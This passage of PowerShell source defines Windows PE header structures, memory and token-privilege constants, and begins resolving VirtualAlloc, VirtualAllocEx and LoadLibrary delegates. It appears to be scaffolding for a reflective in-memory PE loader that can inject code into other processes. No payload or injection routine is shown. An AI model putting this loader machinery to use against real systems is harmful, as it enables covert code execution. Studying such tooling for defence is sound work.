$IMAGE_FILE_HEADER\n\n\t\t    #Struct IMAGE_OPTIONAL_HEADER64\n\t\t    $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n\t\t    $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)\n\t\t    ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null\n\t\t    ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null\n\t\t    ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null\n\t\t    ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null\n\t\t    ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null\n\t\t    ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null\n\t\t    ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null\n\t\t    ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null\n\t\t    ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null\n\t\t    ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null\n\t\t    ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null\n\t\t    ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null\n\t\t    ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null\n\t\t    ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null\n\t\t    ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null\n\t\t    ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null\n\t\t    ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null\n\t\t    ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null\n\t\t    ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null\n\t\t    ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null\n\t\t    ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null\n\t\t    ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null\n\t\t    ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null\n\t\t    ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null\n\t\t    ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null\n\t\t    ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null\n\t\t    ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null\n\t\t    $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64\n\n\t\t    #Struct IMAGE_OPTIONAL_HEADER32\n\t\t    $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'\n\t\t    $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)\n\t\t    ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null\n\t\t    ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null\n\t\t    ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null\n\t\t    ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null\n\t\t    ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null\n\t\t    ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null\n\t\t    ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null\n\t\t    ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null\n\t\t    ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null\n\t\t    ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null\n\t\t    ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null\n\t\t    ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null\n\t\t    ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null\n\t\t    ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null\n\t\t    ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null\n\t\t    ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null\n\t\t    ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null\n\t\t    ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null\n\t\t    ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null\n\t\t    ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null\n\t\t    ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null\n\t\t    ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null\n\t\t    ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null\n\t\t    ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null\n\t\t    ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null\n\t\t    ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null\n\t\t    ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null\n\t\t    ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null\n\t\t    ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null\n\t\t    ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null\n\t\t    $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32\n\n\t\t    #Struct IMAGE_NT_HEADERS64\n\t\t    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t    $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)\n\t\t    $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null\n\t\t    $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64\n\t\t\n\t\t    #Struct IMAGE_NT_HEADERS32\n\t\t    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t    $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)\n\t\t    $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null\n\t\t    $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32\n\n\t\t    #Struct IMAGE_DOS_HEADER\n\t\t    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t    $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)\n\t\t    $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null\n\n\t\t    $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')\n\t\t    $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n\t\t    $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))\n\t\t    $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))\n\t\t    $e_resField.SetCustomAttribute($AttribBuilder)\n\n\t\t    $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null\n\n\t\t    $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')\n\t\t    $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n\t\t    $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))\n\t\t    $e_res2Field.SetCustomAttribute($AttribBuilder)\n\n\t\t    $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null\n\t\t    $IMAGE_DOS_HEADER = $TypeBuilder.CreateType()\t\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER\n\n\t\t    #Struct IMAGE_SECTION_HEADER\n\t\t    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t    $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)\n\n\t\t    $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')\n\t\t    $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray\n\t\t    $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))\n\t\t    $nameField.SetCustomAttribute($AttribBuilder)\n\n\t\t    $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n\t\t    $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER\n\n\t\t    #Struct IMAGE_BASE_RELOCATION\n\t\t    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t    $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)\n\t\t    $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null\n\t\t    $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION\n\n\t\t    #Struct IMAGE_IMPORT_DESCRIPTOR\n\t\t    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t    $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)\n\t\t    $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null\n\t\t    $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR\n\n\t\t    #Struct IMAGE_EXPORT_DIRECTORY\n\t\t    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t    $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)\n\t\t    $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null\n\t\t    $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY\n\t\t\n\t\t    #Struct LUID\n\t\t    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t    $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)\n\t\t    $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null\n\t\t    $LUID = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID\n\t\t\n\t\t    #Struct LUID_AND_ATTRIBUTES\n\t\t    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t    $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)\n\t\t    $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null\n\t\t    $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES\n\t\t\n\t\t    #Struct TOKEN_PRIVILEGES\n\t\t    $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\t\t    $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)\n\t\t    $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null\n\t\t    $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null\n\t\t    $TOKEN_PRIVILEGES = $TypeBuilder.CreateType()\n\t\t    $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES\n\n\t\t    return $Win32Types\n\t    }\n\n\t    Function Get-Win32Constants\n\t    {\n\t\t    $Win32Constants = New-Object System.Object\n\t\t\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2\n\t\t    $Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0\n\t\t\n\t\t    return $Win32Constants\n\t    }\n\n\t    Function Get-Win32Functions\n\t    {\n\t\t    $Win32Functions = New-Object System.Object\n\t\t\n\t\t    $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc\n\t\t    $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])\n\t\t    $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)\n\t\t    $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc\n\t\t\n\t\t    $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx\n\t\t    $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])\n\t\t    $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)\n\t\t    $Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx\n\t\t\n\t\t    $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy\n\t\t    $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])\n\t\t    $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy\n\t\t\n\t\t    $memsetAddr = Get-ProcAddress msvcrt.dll memset\n\t\t    $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])\n\t\t    $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset\n\t\t\n\t\t    $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA\n\t\t    $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])\n\t\t    $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)\n\t\t    $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary\n\t\t\n\t\t    $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress\n\t\t    $GetProcAddressDelegate = 